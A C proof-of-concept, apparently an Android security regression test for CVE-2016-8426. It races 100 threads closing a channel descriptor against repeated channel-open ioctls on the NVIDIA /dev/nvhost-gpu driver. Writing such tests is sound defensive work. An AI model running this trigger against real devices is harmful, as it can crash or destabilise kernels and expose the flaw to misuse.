      1 /*
      2  * Copyright (C) 2017 The Android Open Source Project
      3  *
      4  * Licensed under the Apache License, Version 2.0 (the "License");
      5  * you may not use this file except in compliance with the License.
      6  * You may obtain a copy of the License at
      7  *
      8  *      http://www.apache.org/licenses/LICENSE-2.0
      9  *
     10  * Unless required by applicable law or agreed to in writing, software
     11  * distributed under the License is distributed on an "AS IS" BASIS,
     12  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
     13  * See the License for the specific language governing permissions and
     14  * limitations under the License.
     15  */
     16 #define _GNU_SOURCE
     17 #include <string.h>
     18 #include <stdio.h>
     19 #include <stdlib.h>
     20 #include <pthread.h>
     21 #include <sys/ioctl.h>
     22 #include <sys/mman.h>
     23 #include <errno.h>
     24 #include <sys/stat.h>
     25 #include <fcntl.h>
     26 #include <sched.h>
     27 #include <sys/types.h>
     28 #include <signal.h>
     29 #include <unistd.h>
     30 
/*
 * Print a message followed by the current errno value and its text.
 * fmt must be a string literal, because it is concatenated with the suffix.
 * `##__VA_ARGS__` is a GNU extension that drops the comma when no extra
 * arguments are given.
 */
#define ERR(fmt, ...)   printf(fmt ": %d(%s)\n", ##__VA_ARGS__, errno, strerror(errno))
/* Element count of a true array (not a pointer). NOTE(review): not used in this listing. */
#define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))
/* Number of closer threads main() starts. */
#define CLOSE_THREAD_NUM	100
/* Number of channel-open ioctl iterations main() performs. */
#define TRY_TIMES		900

/* Device node of the driver under test. */
#define DEV "/dev/nvhost-gpu"
     37 
/*
 * Argument block for NVHOST_IOCTL_CHANNEL_OPEN. main() passes it zeroed and
 * prints channel_fd after a successful call; presumably the driver stores the
 * newly created descriptor number here (confirm against the driver header).
 */
struct nvhost_channel_open_args {
	__s32 channel_fd;
};

/* ioctl type byte used to build the request number below. */
#define NVHOST_IOCTL_MAGIC 'H'
/*
 * Request number 112 in the 'H' space, encoded with _IOR (kernel-to-user
 * data direction, size taken from the args struct).
 * NOTE(review): these definitions are local copies rather than an include of
 * the driver's UAPI header, so they must match the kernel under test.
 */
#define NVHOST_IOCTL_CHANNEL_OPEN	\
	_IOR(NVHOST_IOCTL_MAGIC,  112, struct nvhost_channel_open_args)
     45 
/* Descriptor for DEV; opened in main() and used for every channel-open ioctl. */
int fd;
/* Handles of the closer threads, zero-initialised and filled by pthread_create() in main(). */
pthread_t close_thread_id[CLOSE_THREAD_NUM] = { 0 };
/* NOTE(review): not referenced anywhere else in this listing. */
pthread_t toggle_thread_id;
     49 
/*
 * Pin the calling thread to a single CPU.
 *
 * num: index of the CPU to run on.
 *
 * Returns whatever sched_setaffinity() returned: 0 on success, -1 on
 * failure. On failure a diagnostic with errno is printed; callers in this
 * file ignore the return value.
 */
static int set_affinity(int num)
{
	cpu_set_t cpus;
	int rc;

	CPU_ZERO(&cpus);
	CPU_SET(num, &cpus);

	/* pid 0 selects the calling thread. */
	rc = sched_setaffinity(0, sizeof(cpus), &cpus);
	if (rc != -1)
		return rc;

	printf("[-] set affinity failed: [%d]-%s\n", errno, strerror(errno));
	return rc;
}
     62 
/*
 * Placeholder setup hook. It does nothing, and nothing in this listing
 * calls it.
 */
static void prepare()
{
}
     67 
/* Descriptor number the closer threads keep closing; main() sets it from the first channel-open ioctl. */
volatile int target_fd;
/* Run flag for the closer threads: non-zero while the stress loop is active. */
volatile int attack;

/*
 * Body of each closer thread.
 *
 * Pins itself to CPU 1 and, while `attack` is set, sleeps 200 us and then
 * calls close() on `target_fd`. main() runs on CPU 0 and issues channel-open
 * ioctls at the same time, so descriptor teardown overlaps with descriptor
 * creation in the driver.
 *
 * The close() result is deliberately not checked.
 *
 * NOTE(review): `volatile` is not a thread-synchronisation primitive in C;
 * `attack` is read here and written by main() without atomics.
 *
 * no_use: ignored.
 * Returns NULL.
 */
void* close_thread(void* no_use)
{
	(void)no_use;

	set_affinity(1);

	for (;;) {
		if (!attack)
			break;
		usleep(200);
		close(target_fd);
	}

	return NULL;
}
     81 
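/*
 * Stress-test entry point for the channel-open ioctl of DEV. The listing
 * sits in a directory named CVE-2016-8426, so it is presumably the
 * regression test for that issue (confirm against the advisory).
 *
 * Sequence:
 *   1. pin this thread to CPU 0 and open DEV read-only;
 *   2. issue one NVHOST_IOCTL_CHANNEL_OPEN and record the returned
 *      descriptor number in target_fd;
 *   3. start CLOSE_THREAD_NUM closer threads (see close_thread());
 *   4. issue TRY_TIMES further channel-open ioctls, 200 us apart, while the
 *      closer threads run;
 *   5. clear the run flag, join the threads that were started, close DEV.
 *
 * The program always returns 0 and prints only progress lines. It reports no
 * pass/fail verdict, so the outcome has to be judged from outside the
 * process (for example kernel log or device stability) - presumably what
 * the surrounding harness does.
 *
 * Changes relative to the original listing:
 *   - pthread_create() reports failure through its return value and does not
 *     set errno, so the failure message now prints that value, and it uses
 *     the "[-]" prefix like the other error lines;
 *   - joining is driven by a count of threads actually created instead of
 *     testing a pthread_t for truth, which is not portable;
 *   - the unused local `try_time` and the always-true `#if 1` guards are gone.
 */
int main()
{
	int i, ret;
	int created = 0;	/* closer threads successfully started */
	struct nvhost_channel_open_args o_args = { 0 };

	/* bind_cpu */
	set_affinity(0);

	/* open dev */
	fd = open(DEV, O_RDONLY);
	if (fd == -1) {
		ERR("[-] open failed");
		return 0;
	}
	printf("[+] open OK\n");

	ret = ioctl(fd, NVHOST_IOCTL_CHANNEL_OPEN, &o_args);
	if (ret == -1) {
		ERR("[-] ioctl failed");
		goto out_dev;
	}
	printf("[+] ioctl OK, fd = %d\n", o_args.channel_fd);

	/* The closer threads act on this descriptor number. */
	target_fd = o_args.channel_fd;

	/* create close thread */
	attack = 1;
	for (i = 0; i < CLOSE_THREAD_NUM; i++) {
		ret = pthread_create(close_thread_id + i, NULL, close_thread, NULL);
		if (ret) {
			/* ret is the error number; errno is not set by pthread_create(). */
			printf("[-] create close thread %d failed %d %s\n", i, ret, strerror(ret));
			goto out_close_thread;
		}
		created++;
	}

	for (i = 0; i < TRY_TIMES; i++) {
		printf("[+] %03d times\n", i);
		/* open */
		ret = ioctl(fd, NVHOST_IOCTL_CHANNEL_OPEN, &o_args);
		if (ret == -1) {
			ERR("[-] ioctl failed");
		} else {
			printf("[+] ioctl OK, fd = %d\n", o_args.channel_fd);
		}
		usleep(200);
	}

out_close_thread:
	/* Ask the closer threads to stop, then wait for the ones that exist. */
	attack = 0;
	for (i = 0; i < created; i++)
		pthread_join(close_thread_id[i], NULL);
out_dev:
	close(fd);
	return 0;
}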